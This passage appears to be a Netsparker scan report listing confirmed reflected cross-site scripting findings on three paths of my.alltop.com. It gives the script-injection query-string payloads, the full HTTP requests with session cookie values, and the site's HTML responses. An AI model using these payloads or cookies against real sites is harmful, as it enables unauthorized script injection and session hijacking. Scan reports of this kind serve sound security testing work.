onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('password-change').style.display='none';
$(form_el_id).style.display='block';
i..
- /scripts/

/scripts/ CONFIRMED

http://my.alltop.com/scripts/?'"--></style></script><script>alert(0x0000AB)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0000AB)</script>

Request

GET /scripts/?'"--></style></script><script>netsparker(0x0000AB)</script> HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:57 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('password-change').style.display='none';
$(form_el_id)..
- /

/ CONFIRMED

http://my.alltop.com/?'"--></style></script><script>alert(0x0000D5)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0000D5)</script>

Request

GET /?'"--></style></script><script>netsparker(0x0000D5)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:03 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:04 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('password-change').style.display='none';
$(fo..
- /alpha/

/alpha/ CONFIRMED

http://my.alltop.com/alpha/?'"--></style></script><script>alert(0x000143)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000143)</script>

Request

GET /alpha/?'"--></style></script><script>netsparker(0x000143)</script> HTTP/1.1
Referer: http://my.alltop.com/alpha/a
